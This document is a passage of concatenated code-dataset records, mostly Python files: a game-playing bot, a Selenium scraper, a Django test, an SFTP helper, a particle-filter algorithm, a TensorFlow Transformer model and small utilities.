JackTokenizer(\"Main.jack\")\n f = open(\"Main.xml\",\"w\")\n f.write(\"\\n\")\n t.advance()\n while(t.has_more_tokens):\n f.write(\"<{}>{}{}>\\n\".format(t.get_token_type(), t.current_token,t.get_token_type()))\n t.advance()\n f.write(\" \\n\")\n f.close()","sub_path":"nand2tetris/projects/11/JackTokenizer.py","file_name":"JackTokenizer.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"60399232","text":"import pyautogui\nimport time\nfrom PIL import ImageGrab, ImageOps\nfrom numpy import *\n\n\nclass Cord():\n replaybtn = (480, 573)\n dino = (221,580)\n#x=280\n#y=625\n\n\ndef gamerestart():\n pyautogui.click(Cord.replaybtn)\n print(\"RESTARTED GAME\")\n\n\ndef pressspace():\n pyautogui.keyDown('space')\n time.sleep(0.05)\n print(\">>>JUMP<<<\")\n pyautogui.keyUp('space')\n\n\ndef pressdown():\n pyautogui.keyDown('down')\n time.sleep(0.05)\n print(\"DUCK\")\n pyautogui.keyUp('down')\n\n\ndef imggrab():\n # box=(277, 580, 368, 625)\n box = (300, 580, 400, 625)\n image = ImageGrab.grab(box)\n grayimage = ImageOps.grayscale(image)\n imgarray = array(grayimage.getcolors())\n return imgarray.sum()\n\n\ndef main():\n gamerestart()\n while True:\n #4342\n if imggrab() != 4747:\n pressspace()\n time.sleep(0.1)\n else:\n print(\"\\n\")\n time.sleep(0.1)\n\n\nmain()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"324847469","text":"def nearest_larger(arr, i):\n if max(arr) == arr[i]:\n return None\n nearestIdx = 0\n for index in range(len(arr)):\n #In last expression, after \"or\", \"nearestIdx== 0\" is needed, because interpreter should understand \n #whether it is first time to update the \"nearestIdx\" or not\n if arr[index] > arr[i] and i != index and (abs(i - nearestIdx) > abs(i-index) or nearestIdx == 0):\n nearestIdx = index\n return nearestIdx\n","sub_path":"Python/App Academy Exercise/practice-problems2/my solutions in python/00_nearest_larger_spec.py","file_name":"00_nearest_larger_spec.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"60714655","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport random\nfrom bs4 import BeautifulSoup\n\nHeaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\nCardsURL = \"https://ads.twitter.com/transparency/%s/tweet/%s\"\n\nclass Cards():\n def __init__(self, screenName, tweetID):\n self.options = Options()\n self.options.add_argument(\"user-agent=%s\"%(Headers['User-Agent']))\n self.options.add_argument('headless')\n self.driver = webdriver.Chrome(options=self.options)\n self.screenName = screenName\n self.tweetID = tweetID\n \n\n def GetCard(self):\n URL = CardsURL % (self.screenName, self.tweetID)\n print(URL)\n self.driver.get(URL)\n time.sleep(random.randint(3,6))\n for _ in range(5):\n try:\n elem = self.driver.find_element_by_css_selector('a.Card-urlWrapper')\n return elem.text\n except:\n time.sleep(random.randint(5,10))\n return -1","sub_path":"GetCards.py","file_name":"GetCards.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"459670517","text":"from django.apps import apps\nfrom django.test import TestCase\nfrom model_bakery import baker\nfrom rest_framework import serializers\n\nfrom api.serializers.common import MappedSerializerMixin\nfrom api.serializers.registration import UserSerializer\nfrom common.constants import models\n\nProfile = apps.get_model(models.REGISTRATION_PROFILE)\n\n\nclass TestMappedSerializerMixin(TestCase):\n @classmethod\n def setUpTestData(cls):\n class DummyModelSerializer(MappedSerializerMixin, serializers.ModelSerializer):\n serializers_map = {\n 'user': UserSerializer(many=False, read_only=True)\n }\n\n class Meta:\n model = Profile\n fields = ('id', 'user',)\n cls.user = baker.make_recipe('registration.user')\n cls.profile = cls.user.profile\n cls.model_serializer = DummyModelSerializer\n\n def test_normal_serialization_ok(self):\n data = self.model_serializer(instance=self.profile, many=False).data\n\n self.assertEqual(data['id'], self.profile.id)\n self.assertEqual(data['user'], self.user.pk)\n\n def test_mapped_serialization_ok(self):\n data = self.model_serializer(instance=self.profile, many=False, map_fields=['user']).data\n\n self.assertEqual(data['id'], self.profile.id)\n self.assertEqual(data['user']['id'], self.user.id)\n self.assertEqual(data['user']['username'], self.user.username)\n","sub_path":"tests/api/serializers/test_common_serializer.py","file_name":"test_common_serializer.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"643419824","text":"from getpass import getpass\nfrom pathlib import Path\nfrom typing import Union\n\nimport fabric\nfrom paramiko import SSHClient\nfrom scp import SCPClient\n\n__all__ = [\"Connection\"]\n\n\nclass Connection:\n def __init__(\n self,\n username: Union[str, Path] = None,\n host: Union[str, Path] = None,\n protocol: str = \"sftp\",\n *args,\n **kwargs\n ):\n self.user = username or input(\"Enter username: \")\n self.host = host or input(\"Enter host URL: \")\n self._args = list(*args)\n self._kwargs = {**kwargs}\n self.__c = None\n\n if protocol.lower() in [\"sftp\", \"scp\"]:\n self.protocol = protocol.lower()\n else:\n raise ValueError('Protocol must be \"sftp\" or \"scp\".')\n\n def update(self, **kwargs):\n self._kwargs = kwargs\n\n def __call__(self, **kwargs):\n self.update(**kwargs)\n return self\n\n def __str__(self):\n return \"Connection to {} as {}\".format(self.host, self.user)\n\n def __repr__(self):\n return \"<{}.{} object at {}>\".format(\n self.__class__.__module__, self.__class__.__name__, hex(id(self))\n )\n\n def connect(self, **kwargs):\n try:\n keywords = (\n dict(**kwargs)\n or dict(**self._kwargs)\n or dict(password=getpass(\"Enter password: \"))\n )\n if self.protocol == \"sftp\":\n c = fabric.Connection(\n host=self.host, user=self.user, connect_kwargs=keywords\n )\n self.__c = c\n else:\n c = SSHClient()\n c.connect(\n self.host,\n username=self.user,\n password=self._kwargs[\"password\"] or getpass(\"Enter password: \"),\n )\n self.__c = SCPClient(c.get_transport())\n\n return self.__c\n except Exception as e:\n raise e\n\n def __enter__(self, **kwargs):\n return self.connect()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.__c.close()\n","sub_path":"miranda/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"219234396","text":"from .base import SequentialParticleAlgorithm\nfrom .kernels import ParticleMetropolisHastings, SymmetricMH, AdaptiveRandomWalk\nfrom ..utils import get_ess\nfrom ..filters import ParticleFilter\nfrom ..module import TensorContainer\nfrom torch import isfinite\n\n\nclass SMC2(SequentialParticleAlgorithm):\n def __init__(self, filter_, particles, threshold=0.2, kernel: ParticleMetropolisHastings = None, max_increases=5):\n \"\"\"\n Implements the SMC2 algorithm by Chopin et al.\n :param threshold: The threshold at which to perform MCMC rejuvenation\n :param kernel: The kernel to use when updating the parameters\n \"\"\"\n\n super().__init__(filter_, particles)\n\n # ===== When and how to update ===== #\n self._threshold = threshold * particles\n self._kernel = kernel or SymmetricMH()\n\n if not isinstance(self._kernel, ParticleMetropolisHastings):\n raise ValueError(f'The kernel must be of instance {ParticleMetropolisHastings.__class__.__name__}!')\n\n # ===== Some helpers to figure out whether to raise ===== #\n self._max_increases = max_increases\n self._increases = 0\n\n # ===== Save data ===== #\n self._y = TensorContainer()\n\n def _update(self, y):\n # ===== Save data ===== #\n self._y.append(y)\n\n # ===== Perform a filtering move ===== #\n _, ll = self.filter.filter(y)\n self._w_rec += ll\n\n # ===== Calculate efficient number of samples ===== #\n ess = get_ess(self._w_rec)\n self._logged_ess.append(ess)\n\n # ===== Rejuvenate if there are too few samples ===== #\n if ess < self._threshold or (~isfinite(self._w_rec)).any():\n self.rejuvenate()\n self._w_rec[:] = 0.\n\n return self\n\n def rejuvenate(self):\n \"\"\"\n Rejuvenates the particles using a PMCMC move.\n :return: Self\n \"\"\"\n\n # ===== Update the description ===== #\n self._kernel.set_data(self._y.tensors)\n self._kernel.update(self.filter.ssm.theta_dists, self.filter, self._w_rec)\n\n # ===== Increase states if less than 20% are accepted ===== #\n if self._kernel.accepted < 0.2 and isinstance(self.filter, ParticleFilter):\n self._increase_states()\n\n return self\n\n def _increase_states(self):\n \"\"\"\n Increases the number of states.\n :return: Self\n \"\"\"\n\n if self._increases >= self._max_increases:\n raise Exception(f'Configuration only allows {self._max_increases}!')\n\n # ===== Create new filter with double the state particles ===== #\n oldlogl = self.filter.result.loglikelihood\n\n self.filter.reset()\n self.filter.particles = 2 * self.filter.particles[1]\n self.filter.set_nparallel(self._w_rec.shape[0]).initialize().longfilter(self._y.tensors, bar=False)\n\n # ===== Calculate new weights and replace filter ===== #\n self._w_rec = self.filter.result.loglikelihood - oldlogl\n self._increases += 1\n\n return self\n","sub_path":"pyfilter/inference/smc2.py","file_name":"smc2.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"260292017","text":"import sys\nimport argparse\nimport os\n\ntry:\n import zdcode\n import zdcode.zake as zake\n from zdcode.bundle import Bundle\n\nexcept ImportError:\n import __init__ as zdcode\n import zake\n from bundle import Bundle\n\ndef print_parse_error(e):\n print('{}: {}'.format(type(e).__name__, str(e)))\n sys.exit(2)\n\ndef from_stdin():\n data = []\n\n for line in iter(sys.stdin.readline, \"\"):\n data.append(line)\n\n if not data:\n print(\"No data to use! Provide as stdin or as arguments.\")\n sys.exit(1)\n\n print(zdcode.ZDCode.parse(\"\\n\".join(data), error_handler=print_parse_error).decorate())\n\nclass TupleTrue(argparse.Action):\n def __init__(self, option_strings, dest, nargs=None, **kwargs):\n if nargs != 1:\n raise ValueError(\"Invalid nargs for TupleTrue action (only 1 available)\")\n\n super(TupleTrue, self).__init__(option_strings, dest, **kwargs)\n\n def __call__(self, parser, namespace, values, option_string=None):\n l = getattr(namespace, self.dest, None) or []\n\n if not l:\n setattr(namespace, self.dest, l)\n\n l.append((values, True))\n\ndef arg_parser():\n aparser = argparse.ArgumentParser(description='ZDCode compilation and bundling engine.')\n\n aparser.add_argument('input', type=str, metavar='INFILES', nargs='+', help='input files for the compiler (zc2)')\n aparser.add_argument('-od', '--output-decorate', type=argparse.FileType('w'), required=False, metavar='OUTFILE', dest='out_compile', default=None, help='output plain text file from with compiled DECORATE')\n aparser.add_argument('-oa', '--output-pk3-asset', type=argparse.FileType('wb'), required=False, metavar='OUTFILE', dest='out_asset', default=None, help='output file with assets bundled in a pk3')\n aparser.add_argument('-oc', '--output-pk3-code', type=argparse.FileType('wb'), required=False, metavar='OUTFILE', dest='out_code', default=None, help='output file with compiled DECORATE bundled in a pk3')\n aparser.add_argument('-D', '--define', type=str, nargs=1, metavar='DEFNAMES', dest='prepdefs', action=TupleTrue, required=False, help='preprocessor definitions (set to True)')\n aparser.add_argument('-S', '--set', type=str, nargs=2, metavar=('DEFNAME', 'DEFVALS'), dest='prepdefs', action='append', required=False, help='preprocessor definitions (set to a string value)')\n aparser.set_defaults(func=do_bundle)\n\n return aparser\n\ndef main():\n if len(sys.argv) > 1:\n args = arg_parser().parse_args()\n return args.func(args)\n\n return zake.main(print_status_code=False)\n\n# Actions\n\ndef do_compile(args, preproc_defs=()):\n code = zdcode.ZDCode()\n\n for fn in args.input:\n with open(fn) as fp:\n if not code.add(fp.read(), os.path.basename(fn), os.path.dirname(fn), preproc_defs=preproc_defs, error_handler=print_parse_error):\n return 1\n\n dec = code.decorate()\n open(args.out_compile, \"w\").write(dec)\n print(\"Output compiled successfully.\")\n\ndef do_bundle(args, preproc_defs=()):\n bundle = Bundle(*args.input, error_handler=print_parse_error)\n\n status, msg = bundle.bundle(args.out_asset, args.out_code, args.out_compile, preproc_defs={k.upper(): v for (k, v) in getattr(args, 'prepdefs', []) or []})\n print(msg)\n\n return status\n","sub_path":"zdcode/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"500046174","text":"\ndef write(data_number, data_degree, data_diff, array_strings):\n # Formatting for beautiful name\n data_diff = 'int' if data_diff is 1 else 'float'\n data_degree = str(data_degree[0]) + '-' + str(data_degree[1])\n file_name = 'exported/'+str(data_number)+'_'+data_degree+'_'+data_diff+'.txt'\n\n # Open file\n file = open(file_name, 'w')\n # Write result to file\n file.write('\\n\\n')\n for i in array_strings:\n file.write(i)\n file.write('\\n\\n')\n # Close file\n file.close()\n print('Output was exported. Path: ' + file_name)\n\n\n# Just format result for writing to file\ndef format_to_file(number, array_degrees, result):\n i = 0\n array_lines = []\n\n while i < len(result):\n line = str(number) + '^' + str(array_degrees[i]) + ' = ' + str(result[i]) + '\\n'\n array_lines.append(line)\n i += 1\n return array_lines\n","sub_path":"involute/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"271982958","text":"import tensorflow as tf\nimport numpy as np\n\n\n# Positional encoding\n\ndef get_angles(pos,i,d_model):\n return pos / np.power(10000,(2*(i//2))/np.float32(d_model))\n\n\ndef positional_encoding(pos,d_model):\n angle_rads = get_angles(np.arange(pos)[:,np.newaxis],np.arange(d_model)[np.newaxis,:],d_model)\n angle_rads[:,0::2] = np.sin(angle_rads[:,0::2])\n angle_rads[:,1::2] = np.cos(angle_rads[:,1::2])\n pos_encoding = angle_rads[np.newaxis,...]\n return tf.cast(pos_encoding,dtype = tf.float32)\n\n\n# Mask operation\ndef create_pad_mask(seq):\n seq = tf.cast(tf.math.equal(seq,0),tf.float32)\n return seq[:,tf.newaxis,tf.newaxis,:] # (batch_size,1,1,seq_len)\n\ndef create_look_ahead_mask(size):\n mask = 1-tf.linalg.band_part(tf.ones((size,size)),-1,0)\n return mask\n\n\n# Multi_head attention\n\ndef scaled_dot_product_attention(q,k,v,mask):\n matmul_qk= tf.matmul(q,k,transpose_b=True)\n dk = tf.cast(tf.shape(k)[-1],tf.float32)\n scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)\n\n if mask is not None:\n mask=tf.cast(mask,tf.float32)\n scaled_attention_logits += (mask * -1e9)\n\n attention_weights = tf.nn.softmax(scaled_attention_logits,axis = -1)\n output = tf.matmul(attention_weights,v)\n return output,attention_weights\n\nclass MultiHeadAttention(tf.keras.layers.Layer):\n def __init__(self,d_model,num_heads):\n super(MultiHeadAttention,self).__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n\n self.depth = d_model // self.num_heads\n\n self.wq = tf.keras.layers.Dense(d_model)\n self.wk = tf.keras.layers.Dense(d_model)\n self.wv = tf.keras.layers.Dense(d_model)\n\n self.dense = tf.keras.layers.Dense(d_model)\n\n def split_heads(self,x,batch_size):\n x = tf.reshape(x,(batch_size,-1,self.num_heads,self.depth))\n return tf.transpose(x,perm =[0,2,1,3]) # (batch_size,num_heads,seq_len,depth)\n\n def call(self,q,k,v,mask):\n batch_size = tf.shape(q)[0]\n\n q = self.wq(q) # (batch_size,seq_len,d_model)\n k = self.wk(k) # (batch_size,seq_len,d_model)\n v = self.wv(v) # (batch_size,seq_len,d_model)\n\n q = self.split_heads(q,batch_size) # (batch_size,num_heads,seq_len_q,depth)\n k = self.split_heads(k,batch_size) # (batch_size,num_heads,seq_len_k,depth)\n v = self.split_heads(v,batch_size) # (batch_size,num_heads,seq_len_v,depth)\n\n scaled_attention,attention_weights = scaled_dot_product_attention(q,k,v,mask)\n # scaled_attention.shape == (batch_size,num_heads,seq_len_q,depth)\n # attention_weights.shape == (batch_size,num_heads,seq_len_q,seq_len_k)\n\n scaled_attention = tf.transpose(scaled_attention,perm = [0,2,1,3]) # (batch_size,seq_len_q,num_heads,depth)\n concat_attention = tf.reshape(scaled_attention,(batch_size,-1,self.d_model)) # (batch_size,seq_len_q,d_model)\n output = self.dense(concat_attention)\n return output, attention_weights\n\n\n# Point wise feed forward network\n\ndef point_wise_feed_forward_network(d_model,dff):\n return tf.keras.Sequential([tf.keras.layers.Dense(dff,activation = 'relu'),tf.keras.layers.Dense(d_model)])\n\n\nclass LayerNorm(tf.keras.layers.Layer):\n def __init__(self,epsilon=1e-6,scale=True,center=True):\n super(LayerNorm,self).__init__()\n self.epsilon=epsilon\n self.scale=scale\n self.center=center\n self.beta_initializer=tf.keras.initializers.get('zeros')\n self.gamma_initializer=tf.keras.initializers.get('ones')\n self.beta_regularizer=tf.keras.regularizers.get(None)\n self.gamma_regularizer=tf.keras.regularizers.get(None)\n self.beta_constraint=tf.keras.constraints.get(None)\n self.gamma_constraint=tf.keras.constraints.get(None)\n\n def build(self,input_shape):\n if self.scale:\n self.gamma=self.add_weight(name='gamma',shape=input_shape[-1],initializer=self.gamma_initializer,\n regularizer=self.gamma_initializer,constraint=self.gamma_constraint,trainable=True)\n else:\n self.gamma=None\n if self.center:\n self.beta=self.add_weight(name='beta',shape=input_shape[-1],initializer=self.beta_initializer,\n regularizer=self.beta_regularizer,constraint=self.beta_constraint,trainable=True)\n else:\n self.beta=None\n\n def call(self,inputs):\n input_shape=inputs.shape\n mean,variance=tf.nn.moments(x=inputs,axes=[-1],keepdims=True)\n return self.gamma * (inputs-mean)/(variance+self.epsilon) + self.beta\n\n\n\n# Encoder layer\nclass EncoderLayer(tf.keras.layers.Layer):\n def __init__(self,d_model,num_heads,dff,rate = 0.1):\n super(EncoderLayer,self).__init__()\n\n self.mha = MultiHeadAttention(d_model,num_heads)\n self.ffn = point_wise_feed_forward_network(d_model,dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon = 1e-6)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n self.layernorm=LayerNorm(epsilon=1e-6,scale=True,center=True)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n\n def call(self,x,mask,training):\n attn_output,_ = self.mha(x,x,x,mask)\n attn_output = self.dropout1(attn_output,training=training)\n #out1=self.layernorm(x+attn_output)\n\n out1 = self.layernorm1(x+attn_output)\n\n\n ffn_output = self.ffn(out1)\n ffn_output = self.dropout2(ffn_output,training = training)\n out2 = self.layernorm2(out1 + ffn_output)\n\n return out2\n\nclass DecoderLayer(tf.keras.layers.Layer):\n def __init__(self,d_model,num_heads,dff,rate=0.1):\n super(DecoderLayer,self).__init__()\n\n self.mha1 = MultiHeadAttention(d_model, num_heads)\n self.mha2 = MultiHeadAttention(d_model, num_heads)\n\n self.ffn = point_wise_feed_forward_network(d_model, dff)\n\n self.layernorm1 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layernorm2 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n self.layernorm3 = tf.keras.layers.LayerNormalization(epsilon=1e-6)\n\n self.dropout1 = tf.keras.layers.Dropout(rate)\n self.dropout2 = tf.keras.layers.Dropout(rate)\n self.dropout3 = tf.keras.layers.Dropout(rate)\n\n def call(self,x,enc_output,look_ahead_mask,padding_mask,training):\n attn1,attn_weights_block1 = self.mha1(x,x,x,look_ahead_mask)\n attn1 = self.dropout1(attn1,training=training)\n out1 = self.layernorm1(attn1+x)\n\n attn2,attn_weights_block2 = self.mha2(out1,enc_output,enc_output,padding_mask)\n attn2 = self.dropout2(attn2,training = training)\n out2 = self.layernorm2(attn2 + out1)\n\n ffn_output = self.ffn(out2)\n ffn_output = self.dropout3(ffn_output,training=training)\n out3 = self.layernorm3(ffn_output +out2)\n\n return out3,attn_weights_block1,attn_weights_block2\n\n\nclass Encoder(tf.keras.layers.Layer):\n def __init__(self,num_layers,d_model,num_heads,dff,input_vocab_size,maximum_position_encoding,embedding_matrix,rate = 0.1,use_trained_embedding=False):\n super(Encoder,self).__init__()\n self.d_model = d_model\n self.num_alyers = num_layers\n self.use_trained_embedding=use_trained_embedding\n if use_trained_embedding:\n self.embedding = tf.keras.layers.Embedding(embedding_matrix.shape[0], self.d_model,\n weights=[embedding_matrix], trainable=False)\n else:\n self.embedding = tf.keras.layers.Embedding(input_vocab_size,d_model)\n\n self.pos_encoding = positional_encoding(maximum_position_encoding,self.d_model)\n self.enc_layers = [EncoderLayer(d_model,num_heads,dff,rate) for _ in range(num_layers)]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self,x,mask,training):\n seq_len = tf.shape(x)[1]\n\n if self.use_trained_embedding:\n x = self.embedding(x)\n else:\n x = self.embedding(x)\n x *=tf.math.sqrt(tf.cast(self.d_model,tf.float32))\n x+=self.pos_encoding[:,:seq_len,:]\n x=self.dropout(x,training=training)\n\n for i in range(self.num_alyers):\n x = self.enc_layers[i](x,mask,training)\n return x\n\nclass Decoder(tf.keras.layers.Layer):\n def __init__(self,num_layers,d_model,num_heads,dff,target_vocab_size,maximum_position_encoding,embedding_matrix,rate = 0.1,use_trained_embedding=False):\n super(Decoder,self).__init__()\n self.d_model = d_model\n self.num_alyers = num_layers\n self.use_trained_embedding = use_trained_embedding\n if use_trained_embedding:\n self.embedding = tf.keras.layers.Embedding(embedding_matrix.shape[0], self.d_model,\n weights=[embedding_matrix], trainable=False)\n else:\n self.embedding = tf.keras.layers.Embedding(target_vocab_size,d_model)\n\n self.dec_layers = [DecoderLayer(d_model,num_heads,dff,rate) for _ in range(num_layers)]\n self.dropout = tf.keras.layers.Dropout(rate)\n\n def call(self,x,enc_output,look_ahead_mask,padding_mask,training):\n seq_len = tf.shape(x)[1]\n attention_weights ={}\n if self.use_trained_embedding:\n x = self.embedding(x)\n else:\n x = self.embedding(x)\n x *=tf.math.sqrt(tf.cast(self.d_model,tf.float32))\n x+=positional_encoding(seq_len,self.d_model)\n x=self.dropout(x,training=training)\n\n for i in range(self.num_alyers):\n x,block1,block2 = self.dec_layers[i](x,enc_output,look_ahead_mask,padding_mask,training)\n attention_weights['decoder_layer{}_block1'.format(i+1)]=block1\n attention_weights['decoder_layer{}_block2'.format(i + 1)] = block2\n return x,attention_weights\n\n\n\nclass Transformer(tf.keras.Model):\n def __init__(self, num_layers, d_model, num_heads, dff, input_vocab_size,target_vocab_size, max_enc_len, max_dec_len, embedding_matrix,rate=0.1):\n super(Transformer, self).__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, dff,\n input_vocab_size, max_enc_len, embedding_matrix,rate,use_trained_embedding=False)\n\n\n self.decoder = Decoder(num_layers, d_model, num_heads, dff,\n target_vocab_size, max_dec_len,embedding_matrix, rate,use_trained_embedding=False)\n\n self.final_layer = tf.keras.layers.Dense(target_vocab_size)\n\n def call(self, inp, tar, enc_padding_mask,\n look_ahead_mask, dec_padding_mask,training):\n enc_output = self.encoder(inp, enc_padding_mask,training) # (batch_size, inp_seq_len, d_model)\n\n\n # dec_output.shape == (batch_size, tar_seq_len, d_model)\n dec_output, attention_weights = self.decoder(\n tar, enc_output, look_ahead_mask, dec_padding_mask,training)\n\n final_output = self.final_layer(dec_output) # (batch_size, tar_seq_len, target_vocab_size)\n\n return final_output, attention_weights\n\n\ndef create_masks(inp, tar):\n enc_padding_mask = create_pad_mask(inp)\n dec_padding_mask = create_pad_mask(inp)\n\n look_ahead_mask = create_look_ahead_mask(tf.shape(tar)[1].numpy())\n dec_target_padding_mask = create_pad_mask(tar)\n combined_mask = tf.maximum(dec_target_padding_mask, look_ahead_mask)\n\n return enc_padding_mask, combined_mask, dec_padding_mask\n\n\nclass CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):\n def __init__(self,d_model,warmup_steps):\n super(CustomSchedule,self).__init__()\n self.d_model=tf.cast(d_model,tf.float32)\n self.warmup_steps=warmup_steps\n\n def __call__(self,step):\n arg1=tf.math.rsqrt(step)\n arg2=step*(self.warmup_steps**-1.5)\n return tf.math.rsqrt(self.d_model)*tf.math.minimum(arg1,arg2)\n\n","sub_path":"model_layers/Transformer_model.py","file_name":"Transformer_model.py","file_ext":"py","file_size_in_byte":12007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"126298296","text":"#!/usr/bin/env python\n__all__ = [\n \"user\",\n \"owner\",\n \"tab\",\n \"repos\",\n \"orgs\",\n \"examples\",\n \"apps\",\n \"cli\",\n \"style\",\n \"tests\"]\nimport os\nimport plistlib\n\ndef read(path,default=None):\n if os.path.exists(path):\n return open(path).read().rstrip()\n return default\n\ntab = \"index\"\nHOME=os.environ[\"HOME\"]\nservices=os.path.join(HOME,\".services\")\ngithub=os.path.join(HOME,\".services\",\"github.com\")\n\nsearchpath = []\ncwd = os.getcwd()\nrepo = os.path.basename(cwd)\nuser=\"russianidiot\"\nowner = os.path.basename(cwd).split(\".\")[0]\n\ndef webloc_url(path):\n try:\n plist = plistlib.readPlist(path)\n url = plist.URL # UPPERCASE\n return url\n except Exception as e:\n print(\"%s: %s\" % (type(e),str(e)))\n\nclass Service(object):\n path = None\n\n def __init__(self,path):\n self.path = path\n\n @property\n def domain(self):\n return os.path.basename(self.path)\n\n def join(self,*path):\n path = os.path.join(self.path,*path)\n return path\n\n @property\n def exists(self):\n path = self.join(\"exists\")\n return os.path.exists(path)\n\n @property\n def urls(self):\n path = self.join(\"WEBLOC\")\n if not os.path.exists(path):\n return dict()\n urls = dict()\n listdir=os.listdir(path)\n for l in listdir:\n fullpath=os.path.join(path,l)\n url = webloc_url(fullpath)\n name = l.replace(\".webloc\",\"\")\n urls[name] = url\n return urls\n\n def __getattr__(self, attr):\n path = self.join(attr)\n if not os.path.exists(path):\n return\n return open(path).read().rstrip()\n\n def __str__(self):\n return self.path\n\n\nclass Repo(object):\n owner = None\n repo = None\n fullname = None\n\n def __init__(self, owner,repo):\n self.owner = owner\n self.repo = repo\n self.fullname=\"%s/%s\" % (self.owner,self.repo)\n\n @property\n def ext(self):\n return self.repo.split(\".\")[-1:][0]\n\n @property\n def description(self):\n for f in [\"description\",\"description.txt\"]:\n path = os.path.join(github,self.fullname,f)\n if os.path.exists(path):\n return read(path)\n\n @property\n def ssh_url(self):\n url = \"git@github.com:%s/%s.git\" (user, name)\n if self.org:\n url = \"git@github.com:%s/%s.git\" (self.owner, name)\n return url\n\n @property\n def pypiname(self):\n pkgname = self.repo.split(\".\")[0].lower()\n return pkgname\n\n @property\n def npmname(self):\n if \".py\" in self.repo:\n return\n npmname = self.repo.split(\".\")[0].lower()\n return npmname\n\n @property\n def services(self):\n services=dict()\n path=os.path.join(github,self.fullname)\n if os.path.exists(path) and os.path.isdir(path):\n listdir=os.listdir(path)\n for l in listdir:\n fullpath=os.path.join(path,l)\n if os.path.isdir(fullpath):\n services[l] = Service(fullpath)\n return services\n\n def __str__(self):\n return self.repo\n\n def __repr__(self):\n return self.repo\n\n\nclass Org(object):\n name = None\n\n def __init__(self, name):\n self.name = name\n\n @property\n def description(self):\n path = os.path.join(github, self.name, \"description.txt\")\n if not os.path.exists(path):\n return\n return open(path).read()\n\n @property\n def repos(self):\n return []\n\n @property\n def count(self):\n return len(self.repos)\n\n# ~/.services/github.com/owner/repo/\n# owner.github.com\npath = os.path.join(github,owner)\nif not os.path.exists(path):\n raise OSError(\"%s NOT EXISTS\" % path)\nlistdir = os.listdir(path)\nrepos = []\norgs = []\nfor l in listdir:\n fullpath = os.path.join(path,l)\n if os.path.isdir(fullpath):\n r = Repo(owner=owner,repo=l)\n repos.append(r)\n\nrepos = sorted(repos, key=lambda r: r.repo.lower())\n\nlistdir = os.listdir(github)\nfor l in listdir:\n if l.find(\".\")!=0:\n org = Org(l)\n orgs.append(org)\n\nexamples = list(filter(lambda org: org.name.find(\"examples\") >= 0, orgs))\n\ndefault_keys = globals().keys()\n\n# Python\npython = list(filter(lambda r: r.ext == \"py\", repos))\n# Apps\napps = list(filter(lambda r: r.ext == \"app\", repos))\ncli = list(filter(lambda r: r.ext == \"cli\", repos))\nstyle = list(filter(lambda r: \".py\" in r.repo, repos))\ntests = list(filter(lambda r: \".py\" in r.repo or \".cli\" in r.repo, repos))\n\n\nkeys = globals().keys()\nnew_keys = list(set(keys) - set(default_keys))\n__all__ += new_keys\n\nif __name__ == \"__main__\":\n print(\"__all__ = %s\" % __all__)\n print(\"repos: %s\" % len(repos))\n print(\"examples: %s\" % len(examples))\n # for e in examples:\n # print(\"%s (%s)\" % (e.name, e.count))\n print(\"%s cli\" % len(cli))\n print(\"%s python\" % len(python))\n print(\"%s style\" % len(style))\n print(\"%s tests\" % len(tests))\n print(\"%s apps\" % len(apps))\n","sub_path":"dotfiles/jinja/github/site/pages/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
